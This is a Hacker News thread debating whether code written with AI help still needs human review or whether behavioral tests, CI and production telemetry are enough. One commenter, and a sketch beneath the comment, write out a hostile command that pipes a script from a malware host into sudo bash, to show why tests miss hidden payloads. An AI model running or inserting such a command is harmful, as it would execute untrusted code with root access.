top | item 46685251

tuckwat | 1 month ago

> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.

Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.

SilenN|1 month ago

Agreed, and with the comments in the thread as well.

I'll caveat my statement: it applies to AI-ready repos, meaning those with good documentation, good comments (e.g. avoiding Chesterton's fence), comprehensive interface tests, Sentry, CI/CD, etc.

Established repos are harder because a) the marginal cost of something going wrong is much higher, b) there are more dependencies, and c) that makes it harder to 'comprehensively' ensure the AI didn't mess anything up.

I say this in the article:

> There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you.

Try pushing the boundary. It's like figuring out the minimum amount of sleep you need: you undersleep and oversleep a couple of times, but you end up with a good idea of where the line is.

To be clear, I'm not advocating for canonical 'vibe coding', just that what it means to be a good engineer has changed again. The most valuable skills are now 1) quickly building a mental map of code at the speed of changes, 2) debugging and refactoring, 3) prompting, and 4) ensuring everything works (verifiability).

We should also focus more on the derivative than our point in time.

creshal|1 month ago

> Just that what it means to be a good engineer has changed again.

And not even by much: 1, 2, and 4 have always been signs of good engineers.

worksonmine|1 month ago

> Being able to quickly create a mental map of code at the speed of changes

I get the feeling you're intentionally being a parody with that line.

> and ensuring everything works (verifiability) are now the most valuable skills.

Something might look like it works, and pass all the tests, but it could still be running `wget -qO- https://malware.sh | sudo bash`. Without knowing that it's there, how will your tests catch it?

My example is exaggerated; in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened: OpenCode is a recent example, and it was on the front page a few days ago. You should check it out. Of course you have to review the code. Who are you trying to fool?
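The reviewer's point can be made concrete with a hypothetical sketch (all names invented): a function whose tested behavior is correct, so a behavior-level suite stays green, while a hidden side effect goes entirely unobserved.

```python
def normalize_email(address: str) -> str:
    """Lowercase and strip an email address -- the tested behavior."""
    # Hidden payload would go here; behavioral tests never observe it.
    # e.g. os.system("wget -qO- https://malware.sh | sudo bash")
    # (left as a comment here, shown only to illustrate the point)
    return address.strip().lower()

# The behavior-level test passes...
assert normalize_email("  Alice@Example.COM ") == "alice@example.com"
# ...yet no test of inputs and outputs would flag the payload above.
```

Only reading the code (or auditing syscalls/network traffic) reveals the side effect, which is why behavioral testing alone can't replace review.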

> We should also focus more on the derivative than our point in time.

So why are you selling it as possible at "our point in time" (are you getting paid per buzzword)? I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill, bro".

Extremely depressing to see this happening to the craft I used to love.

madrox|1 month ago

It doesn't work... yet. I agree my stomach churns a little at this sentence. However, paying customers care about reliability and performance. Code review helps with that today, but it's only a matter of time before it becomes more performative than useful in serving those goals, at the cost of velocity.

AIorNot|1 month ago

The (multi-)billion-dollar question is when that will happen, I think. Case in point:

The OP is a kid in his 20s describing the history of the last 3 years or so of small-scale AI development (https://www.linkedin.com/in/silen-naihin/details/experience/).

How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers, use cases, etc.?

When will AI be ready? Microsoft tried to push AI into big enterprise; Anthropic is doing a better job, but it's all still in its infancy.

Personally, I hope it won't be ready for another 10 years so I can retire before it takes over :)

I remember when folks on HN all called this AI stuff made up

jasondigitized|1 month ago

Nah. Most successful startups don't worry about super-tight code up front; they hack the shit out of something and support tens of thousands of users with completely garbage code and architecture.

I know this because I am at one now, making an ungodly amount of money with 50k active users a day on a complete mudball of a monolithic node + react + postgres app used by multiple Fortune 100 companies.

nzoschke|1 month ago

Counter argument...

High velocity teams also observe production system telemetry and use error rates, tracing and more to maintain high SLAs for customers.

They set a "budget" and use feature flagging to release risky code, then roll back or roll forward based on metrics.

So agentic coding can feed back on observed behaviors in production too.
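The budget-and-flag loop described above can be sketched in a few lines. This is a minimal illustration with invented names and a made-up threshold, not any particular team's setup: a feature flag guards the risky release, and the observed error rate against the budget decides whether to roll back.

```python
ERROR_BUDGET = 0.01  # max tolerated error rate for the release (assumed value)

def should_rollback(errors: int, requests: int, budget: float = ERROR_BUDGET) -> bool:
    """Roll back when the observed error rate exhausts the budget."""
    if requests == 0:
        return False  # no traffic yet, nothing to judge
    return errors / requests > budget

# 30 errors in 1,000 requests is a 3% error rate, over the 1% budget:
flag_enabled = not should_rollback(errors=30, requests=1000)
```

In practice the error rate would come from production telemetry (Sentry, tracing, etc.), and an agent could consume the same signal to decide whether its change survives.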

ithkuil|1 month ago

It's definitely an area where we'll all learn a lot in the upcoming years.

But we have to use this "innovation budget" in a careful way.

zdragnar|1 month ago

Everyone who is responsible for SOC 2 at their company just felt a disturbance.

Honestly, I can't wait for AI development practices to mature, because I'm really tired of the fake hype and missteps getting in the way of things.

LtWorf|1 month ago

Why would AI not fall for fake hype?